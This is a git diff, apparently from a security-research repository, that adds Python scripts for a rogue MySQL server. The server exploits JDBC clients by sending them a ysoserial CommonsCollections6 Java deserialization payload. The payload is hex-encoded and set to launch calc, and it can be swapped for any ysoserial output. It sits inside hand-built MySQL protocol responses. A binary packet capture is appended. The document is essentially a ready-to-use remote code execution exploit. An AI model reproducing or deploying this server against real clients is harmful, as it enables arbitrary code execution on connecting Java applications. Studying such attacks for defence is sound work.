str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + send_data(conn, mysql_data) + data = receive_data(conn) + if "show warnings" in data: + payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000' + send_data(conn, payload) + break + + +if __name__ == '__main__': + HOST ='127.0.0.1' + PORT = 3307 + + sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + #当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间 + sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sk.bind((HOST, PORT)) + sk.listen(1) + + print("start fake mysql server listening on {}:{}".format(HOST,PORT)) + + run() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py index e69de29..dc76486 100644 --- a/PyCharm/JDBC/Mysql/fakeServerM4x.py +++ b/PyCharm/JDBC/Mysql/fakeServerM4x.py @@ -0,0 +1,90 @@ +import binascii +import os +import socket +import threading + +SHOW_VARIABLES = False + +def get_payload_content(): + #file文件的内容使用ysoserial生成的 使用规则:java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\CommonsCollections6.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878' + return payload_content + +def get_data(pdata = b''): + global SHOW_VARIABLES + if b'SHOW VARIABLE' in pdata.upper(): + print("回显变量") + SHOW_VARIABLES = True + return "01000001025200000203646566001173657373696f6e5f7661726961626c65731173657373696f6e5f7661726961626c65730d5661726961626c655f6e616d650d5661726961626c655f6e616d650c2100c0000000fd01100000004200000303646566001173657373696f6e5f7661726961626c65731173657373696f6e5f7661726961626c65730556616c75650556616c75650c2100000c0000fd000000000005000004fe000022001a000005146368617261637465725f7365745f636c69656e7404757466381e000006186368617261637465725f7365745f636f6e6e656374696f6e04757466381b000007156368617261637465725f7365745f726573756c747304757466381a000008146368617261637465725f7365745f73657276657204757466381c0000090c696e69745f636f6e6e6563740e534554204e414d455320757466381800000a13696e7465726163746976655f74696d656f7574033132301900000b166c6f7765725f636173655f7461626c655f6e616d657301311c00000c126d61785f616c6c6f7765645f7061636b65740831363737373231361800000d116e65745f6275666665725f6c656e6774680531363338341500000e116e65745f77726974655f74696d656f75740236301900000f1071756572795f63616368655f73697a650731303438353736150000101071756572795f63616368655f74797065034f4646930000110873716c5f6d6f6465894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e120000121073797374656d5f74696d655f7a6f6e6500110000130974696d655f7a6f6e650653595354454d26000014157472616e73616374696f6e5f69736f6c6174696f6e0f52455045415441424c452d524541441d0000150c74785f69736f6c6174696f6e0f52455045415441424c452d52454144110000160c776169745f74696d656f75740331323005000017fe01002200" + elif b'SHOW WARNINGS' in pdata.upper(): + print("回显告警") + return "01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000005000005fe000002006a000006075761726e696e6704313336365c496e636f727265637420737472696e672076616c75653a20275c7844365c7844305c7842395c7846415c7842315c7845412e2e2e2720666f7220636f6c756d6e20275641524941424c455f56414c55452720617420726f772034383505000007fe00000200" + elif b'SELECT @@session.auto_increment_increment'.upper() in pdata.upper(): + print("回显auto_increment_increment") + return "0100000101380000020364656600000022404073657373696f6e2e6175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a00000000005000003fe0000020002000004013105000005fe00000200" + elif b'SELECT @@session.autocommit'.upper() in pdata.upper(): + print("回显autocommit") + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + elif b'SHOW COLLATION' in pdata.upper(): + print("回显COLLATION") + return "0100000106530000020364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5309436f6c6c6174696f6e0e434f4c4c4154494f4e5f4e414d450c210060000000fd0100000000550000030364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530743686172736574124348415241435445525f5345545f4e414d450c210060000000fd0100000000400000040364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530249640249440c3f000b0000000801000000004d0000050364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530744656661756c740a49535f44454641554c540c210009000000fd01000000004f0000060364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5308436f6d70696c65640b49535f434f4d50494c45440c210009000000fd01000000004a0000070364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5307536f72746c656e07534f52544c454e0c3f000300000008010000000005000008fe00002200210000090f626967355f6368696e6573655f636904626967350131035965730359657301311800000a08626967355f62696e0462696735023834000359657301312100000b0f646563385f737765646973685f636904646563380133035965730359657301311800000c08646563385f62696e0464656338023639000359657301312300000d1063703835305f67656e6572616c5f63690563703835300134035965730359657301311a00000e0963703835305f62696e056370383530023830000359657301311f00000f0e6870385f656e676c6973685f63690368703801360359657303596573013116000010076870385f62696e036870380237320003596573013123000011106b6f6938725f67656e6572616c5f6369056b6f6938720137035965730359657301311a000012096b6f6938725f62696e056b6f6938720237340003596573013122000013116c6174696e315f6765726d616e315f6369066c6174696e3101350003596573013125000014116c6174696e315f737765646973685f6369066c6174696e3101380359657303596573013122000015106c6174696e315f64616e6973685f6369066c6174696e310231350003596573013123000016116c6174696e315f6765726d616e325f6369066c6174696e31023331000359657301321c0000170a6c6174696e315f62696e066c6174696e310234370003596573013123000018116c6174696e315f67656e6572616c5f6369066c6174696e310234380003596573013123000019116c6174696e315f67656e6572616c5f6373066c6174696e31023439000359657301312300001a116c6174696e315f7370616e6973685f6369066c6174696e31023934000359657301312000001b0f6c6174696e325f637a6563685f6373066c6174696e320132000359657301342500001c116c6174696e325f67656e6572616c5f6369066c6174696e320139035965730359657301312500001d136c6174696e325f68756e67617269616e5f6369066c6174696e32023231000359657301312400001e126c6174696e325f63726f617469616e5f6369066c6174696e32023237000359657301311c00001f0a6c6174696e325f62696e066c6174696e3202373700035965730131220000200f737765375f737765646973685f63690473776537023130035965730359657301311800002108737765375f62696e047377653702383200035965730131240000221061736369695f67656e6572616c5f6369056173636969023131035965730359657301311a0000230961736369695f62696e056173636969023635000359657301312300002410756a69735f6a6170616e6573655f636904756a6973023132035965730359657301311800002508756a69735f62696e04756a6973023931000359657301312300002610736a69735f6a6170616e6573655f636904736a6973023133035965730359657301311800002708736a69735f62696e04736a69730238380003596573013126000028116865627265775f67656e6572616c5f636906686562726577023136035965730359657301311c0000290a6865627265775f62696e06686562726577023731000359657301312300002a0e7469733632305f746861695f636906746973363230023138035965730359657301341c00002b0a7469733632305f62696e06746973363230023839000359657301312300002c0f6575636b725f6b6f7265616e5f6369056575636b72023139035965730359657301311a00002d096575636b725f62696e056575636b72023835000359657301312400002e106b6f6938755f67656e6572616c5f6369056b6f693875023232035965730359657301311a00002f096b6f6938755f62696e056b6f6938750237350003596573013126000030116762323331325f6368696e6573655f636906676232333132023234035965730359657301311c0000310a6762323331325f62696e06676232333132023836000359657301312400003210677265656b5f67656e6572616c5f636905677265656b023235035965730359657301311a00003309677265656b5f62696e05677265656b0237300003596573013126000034116370313235305f67656e6572616c5f63690663703132353002323603596573035965730131210000350f6370313235305f637a6563685f6373066370313235300233340003596573013224000036126370313235305f63726f617469616e5f636906637031323530023434000359657301311c0000370a6370313235305f62696e066370313235300236360003596573013122000038106370313235305f706f6c6973685f63690663703132353002393900035965730131200000390e67626b5f6368696e6573655f63690367626b023238035965730359657301311600003a0767626b5f62696e0367626b023837000359657301312600003b116c6174696e355f7475726b6973685f6369066c6174696e35023330035965730359657301311c00003c0a6c6174696e355f62696e066c6174696e35023738000359657301312a00003d1361726d73636969385f67656e6572616c5f63690861726d7363696938023332035965730359657301312000003e0c61726d73636969385f62696e0861726d7363696938023634000359657301312200003f0f757466385f67656e6572616c5f63690475746638023333035965730359657301311800004008757466385f62696e047574663802383300035965730131200000410f757466385f756e69636f64655f6369047574663803313932000359657301382200004211757466385f6963656c616e6469635f636904757466380331393300035965730138200000430f757466385f6c61747669616e5f6369047574663803313934000359657301382100004410757466385f726f6d616e69616e5f6369047574663803313935000359657301382200004511757466385f736c6f76656e69616e5f6369047574663803313936000359657301381f0000460e757466385f706f6c6973685f6369047574663803313937000359657301382100004710757466385f6573746f6e69616e5f636904757466380331393800035965730138200000480f757466385f7370616e6973685f636904757466380331393900035965730138200000490f757466385f737765646973685f6369047574663803323030000359657301382000004a0f757466385f7475726b6973685f6369047574663803323031000359657301381e00004b0d757466385f637a6563685f6369047574663803323032000359657301381f00004c0e757466385f64616e6973685f6369047574663803323033000359657301382300004d12757466385f6c69746875616e69616e5f6369047574663803323034000359657301381f00004e0e757466385f736c6f76616b5f6369047574663803323035000359657301382100004f10757466385f7370616e697368325f6369047574663803323036000359657301381e0000500d757466385f726f6d616e5f636904757466380332303700035965730138200000510f757466385f7065727369616e5f6369047574663803323038000359657301382200005211757466385f6573706572616e746f5f6369047574663803323039000359657301382200005311757466385f68756e67617269616e5f636904757466380332313000035965730138200000540f757466385f73696e68616c615f636904757466380332313100035965730138200000550f757466385f6765726d616e325f6369047574663803323132000359657301382100005610757466385f63726f617469616e5f6369047574663803323133000359657301382400005713757466385f756e69636f64655f3532305f6369047574663803323134000359657301382300005812757466385f766965746e616d6573655f6369047574663803323135000359657301382900005918757466385f67656e6572616c5f6d7973716c3530305f6369047574663803323233000359657301312200005a0f756373325f67656e6572616c5f63690475637332023335035965730359657301311800005b08756373325f62696e0475637332023930000359657301312000005c0f756373325f756e69636f64655f6369047563733203313238000359657301382200005d11756373325f6963656c616e6469635f6369047563733203313239000359657301382000005e0f756373325f6c61747669616e5f6369047563733203313330000359657301382100005f10756373325f726f6d616e69616e5f6369047563733203313331000359657301382200006011756373325f736c6f76656e69616e5f6369047563733203313332000359657301381f0000610e756373325f706f6c6973685f6369047563733203313333000359657301382100006210756373325f6573746f6e69616e5f636904756373320331333400035965730138200000630f756373325f7370616e6973685f636904756373320331333500035965730138200000640f756373325f737765646973685f636904756373320331333600035965730138200000650f756373325f7475726b6973685f6369047563733203313337000359657301381e0000660d756373325f637a6563685f6369047563733203313338000359657301381f0000670e756373325f64616e6973685f6369047563733203313339000359657301382300006812756373325f6c69746875616e69616e5f6369047563733203313430000359657301381f0000690e756373325f736c6f76616b5f6369047563733203313431000359657301382100006a10756373325f7370616e697368325f6369047563733203313432000359657301381e00006b0d756373325f726f6d616e5f6369047563733203313433000359657301382000006c0f756373325f7065727369616e5f6369047563733203313434000359657301382200006d11756373325f6573706572616e746f5f6369047563733203313435000359657301382200006e11756373325f68756e67617269616e5f6369047563733203313436000359657301382000006f0f756373325f73696e68616c615f636904756373320331343700035965730138200000700f756373325f6765726d616e325f6369047563733203313438000359657301382100007110756373325f63726f617469616e5f6369047563733203313439000359657301382400007213756373325f756e69636f64655f3532305f6369047563733203313530000359657301382300007312756373325f766965746e616d6573655f6369047563733203313531000359657301382900007418756373325f67656e6572616c5f6d7973716c3530305f636904756373320331353900035965730131240000751063703836365f67656e6572616c5f6369056370383636023336035965730359657301311a0000760963703836365f62696e0563703836360236380003596573013128000077126b6579626373325f67656e6572616c5f6369076b657962637332023337035965730359657301311e0000780b6b6579626373325f62696e076b6579626373320237330003596573013124000079106d616363655f67656e6572616c5f6369056d61636365023338035965730359657301311a00007a096d616363655f62696e056d61636365023433000359657301312a00007b136d6163726f6d616e5f67656e6572616c5f6369086d6163726f6d616e023339035965730359657301312000007c0c6d6163726f6d616e5f62696e086d6163726f6d616e023533000359657301312400007d1063703835325f67656e6572616c5f6369056370383532023430035965730359657301311a00007e0963703835325f62696e056370383532023831000359657301312400007f126c6174696e375f6573746f6e69616e5f6373066c6174696e370232300003596573013126000080116c6174696e375f67656e6572616c5f6369066c6174696e370234310359657303596573013123000081116c6174696e375f67656e6572616c5f6373066c6174696e37023432000359657301311c0000820a6c6174696e375f62696e066c6174696e37023739000359657301312800008312757466386d62345f67656e6572616c5f636907757466386d6234023435035965730359657301311e0000840b757466386d62345f62696e07757466386d6234023436000359657301312600008512757466386d62345f756e69636f64655f636907757466386d623403323234000359657301382800008614757466386d62345f6963656c616e6469635f636907757466386d623403323235000359657301382600008712757466386d62345f6c61747669616e5f636907757466386d623403323236000359657301382700008813757466386d62345f726f6d616e69616e5f636907757466386d623403323237000359657301382800008914757466386d62345f736c6f76656e69616e5f636907757466386d623403323238000359657301382500008a11757466386d62345f706f6c6973685f636907757466386d623403323239000359657301382700008b13757466386d62345f6573746f6e69616e5f636907757466386d623403323330000359657301382600008c12757466386d62345f7370616e6973685f636907757466386d623403323331000359657301382600008d12757466386d62345f737765646973685f636907757466386d623403323332000359657301382600008e12757466386d62345f7475726b6973685f636907757466386d623403323333000359657301382400008f10757466386d62345f637a6563685f636907757466386d623403323334000359657301382500009011757466386d62345f64616e6973685f636907757466386d623403323335000359657301382900009115757466386d62345f6c69746875616e69616e5f636907757466386d623403323336000359657301382500009211757466386d62345f736c6f76616b5f636907757466386d623403323337000359657301382700009313757466386d62345f7370616e697368325f636907757466386d623403323338000359657301382400009410757466386d62345f726f6d616e5f636907757466386d623403323339000359657301382600009512757466386d62345f7065727369616e5f636907757466386d623403323430000359657301382800009614757466386d62345f6573706572616e746f5f636907757466386d623403323431000359657301382800009714757466386d62345f68756e67617269616e5f636907757466386d623403323432000359657301382600009812757466386d62345f73696e68616c615f636907757466386d623403323433000359657301382600009912757466386d62345f6765726d616e325f636907757466386d623403323434000359657301382700009a13757466386d62345f63726f617469616e5f636907757466386d623403323435000359657301382a00009b16757466386d62345f756e69636f64655f3532305f636907757466386d623403323436000359657301382900009c15757466386d62345f766965746e616d6573655f636907757466386d623403323437000359657301382500009d136370313235315f62756c67617269616e5f636906637031323531023134000359657301312500009e136370313235315f756b7261696e69616e5f636906637031323531023233000359657301311c00009f0a6370313235315f62696e0663703132353102353000035965730131260000a0116370313235315f67656e6572616c5f63690663703132353102353103596573035965730131230000a1116370313235315f67656e6572616c5f63730663703132353102353200035965730131240000a21075746631365f67656e6572616c5f6369057574663136023534035965730359657301311a0000a30975746631365f62696e05757466313602353500035965730131220000a41075746631365f756e69636f64655f63690575746631360331303100035965730138240000a51275746631365f6963656c616e6469635f63690575746631360331303200035965730138220000a61075746631365f6c61747669616e5f63690575746631360331303300035965730138230000a71175746631365f726f6d616e69616e5f63690575746631360331303400035965730138240000a81275746631365f736c6f76656e69616e5f63690575746631360331303500035965730138210000a90f75746631365f706f6c6973685f63690575746631360331303600035965730138230000aa1175746631365f6573746f6e69616e5f63690575746631360331303700035965730138220000ab1075746631365f7370616e6973685f63690575746631360331303800035965730138220000ac1075746631365f737765646973685f63690575746631360331303900035965730138220000ad1075746631365f7475726b6973685f63690575746631360331313000035965730138200000ae0e75746631365f637a6563685f63690575746631360331313100035965730138210000af0f75746631365f64616e6973685f63690575746631360331313200035965730138250000b01375746631365f6c69746875616e69616e5f63690575746631360331313300035965730138210000b10f75746631365f736c6f76616b5f63690575746631360331313400035965730138230000b21175746631365f7370616e697368325f63690575746631360331313500035965730138200000b30e75746631365f726f6d616e5f63690575746631360331313600035965730138220000b41075746631365f7065727369616e5f63690575746631360331313700035965730138240000b51275746631365f6573706572616e746f5f63690575746631360331313800035965730138240000b61275746631365f68756e67617269616e5f63690575746631360331313900035965730138220000b71075746631365f73696e68616c615f63690575746631360331323000035965730138220000b81075746631365f6765726d616e325f63690575746631360331323100035965730138230000b91175746631365f63726f617469616e5f63690575746631360331323200035965730138260000ba1475746631365f756e69636f64655f3532305f63690575746631360331323300035965730138250000bb1375746631365f766965746e616d6573655f63690575746631360331323400035965730138280000bc1275746631366c655f67656e6572616c5f63690775746631366c65023536035965730359657301311e0000bd0b75746631366c655f62696e0775746631366c6502363200035965730131260000be116370313235365f67656e6572616c5f636906637031323536023537035965730359657301311c0000bf0a6370313235365f62696e0663703132353602363700035965730131260000c0146370313235375f6c69746875616e69616e5f636906637031323537023239000359657301311c0000c10a6370313235375f62696e0663703132353702353800035965730131260000c2116370313235375f67656e6572616c5f63690663703132353702353903596573035965730131240000c31075746633325f67656e6572616c5f6369057574663332023630035965730359657301311a0000c40975746633325f62696e05757466333202363100035965730131220000c51075746633325f756e69636f64655f63690575746633320331363000035965730138240000c61275746633325f6963656c616e6469635f63690575746633320331363100035965730138220000c71075746633325f6c61747669616e5f63690575746633320331363200035965730138230000c81175746633325f726f6d616e69616e5f63690575746633320331363300035965730138240000c91275746633325f736c6f76656e69616e5f63690575746633320331363400035965730138210000ca0f75746633325f706f6c6973685f63690575746633320331363500035965730138230000cb1175746633325f6573746f6e69616e5f63690575746633320331363600035965730138220000cc1075746633325f7370616e6973685f63690575746633320331363700035965730138220000cd1075746633325f737765646973685f63690575746633320331363800035965730138220000ce1075746633325f7475726b6973685f63690575746633320331363900035965730138200000cf0e75746633325f637a6563685f63690575746633320331373000035965730138210000d00f75746633325f64616e6973685f63690575746633320331373100035965730138250000d11375746633325f6c69746875616e69616e5f63690575746633320331373200035965730138210000d20f75746633325f736c6f76616b5f63690575746633320331373300035965730138230000d31175746633325f7370616e697368325f63690575746633320331373400035965730138200000d40e75746633325f726f6d616e5f63690575746633320331373500035965730138220000d51075746633325f7065727369616e5f63690575746633320331373600035965730138240000d61275746633325f6573706572616e746f5f63690575746633320331373700035965730138240000d71275746633325f68756e67617269616e5f63690575746633320331373800035965730138220000d81075746633325f73696e68616c615f63690575746633320331373900035965730138220000d91075746633325f6765726d616e325f63690575746633320331383000035965730138230000da1175746633325f63726f617469616e5f63690575746633320331383100035965730138260000db1475746633325f756e69636f64655f3532305f63690575746633320331383200035965730138250000dc1375746633325f766965746e616d6573655f636905757466333203313833000359657301381b0000dd0662696e6172790662696e61727902363303596573035965730131280000de1267656f737464385f67656e6572616c5f63690767656f73746438023932035965730359657301311e0000df0b67656f737464385f62696e0767656f7374643802393300035965730131250000e01163703933325f6a6170616e6573655f6369056370393332023935035965730359657301311a0000e10963703933325f62696e05637039333202393600035965730131290000e2136575636a706d735f6a6170616e6573655f6369076575636a706d73023937035965730359657301311e0000e30b6575636a706d735f62696e076575636a706d7302393800035965730131290000e412676231383033305f6368696e6573655f6369076762313830333003323438035965730359657301321f0000e50b676231383033305f62696e076762313830333003323439000359657301312a0000e616676231383033305f756e69636f64655f3532305f636907676231383033300332353000035965730138050000e7fe00002200" + elif b'SET ' in pdata.upper(): + print("回显SET包") + return "0700000200000002000000" + else: + print("未知请求") + print(pdata) + return "01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000005000003fe0000020002000004013105000005fe00000200" + +def process(conn): + global SHOW_VARIABLES + #hello 包 + print("发送hello包") + conn.sendall(bytes.fromhex("4a0000000a352e372e32360018000000374a10207a5f771e00fff7c00200ff81150000000000000000000025551379067c13160d46727b006d7973716c5f6e61746976655f70617373776f726400")) + + # 接收登录包 + conn.recv(10240) + print("接收到登录包") + + # 登录成功包 + conn.sendall(bytes.fromhex("0700000200000002000000")) + print("给客户端响应登录成功") + + while True: + data = conn.recv(10240) + if b'SHOW SESSION STATUS' in data.upper(): + conn.sendall(bytes.fromhex("0100000103")) + conn.sendall(bytes.fromhex("1a000002036465660001610161016101610c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("1a000003036465660001610161016201620c3f001c000000fcffff0000001a000004036465660001610161016301630c3f001c000000fcffff000000")) + conn.sendall(bytes.fromhex("05000005fe00000200")) + payload_content = get_payload_content() + mysql_data = "" + payload_length = str(hex(len(payload_content) // 2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + data_len = str(hex(len(payload_content) // 2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc' + payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + conn.sendall(bytes.fromhex(mysql_data)) + print("交互完成") + else: + conn.sendall(bytes.fromhex(get_data(data))) + +sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +sk.bind(("0.0.0.0", 3307)) +sk.listen(1) + +while True: + conn, addr = sk.accept() + threading.Thread(target=process, args=(conn,)).start() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/hex.pcap b/PyCharm/JDBC/Mysql/hex.pcap new file mode 100644 index 0000000000000000000000000000000000000000..d04bd062c8b9f0c925942d776b3965ed8bb32e9a GIT binary patch literal 5188 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 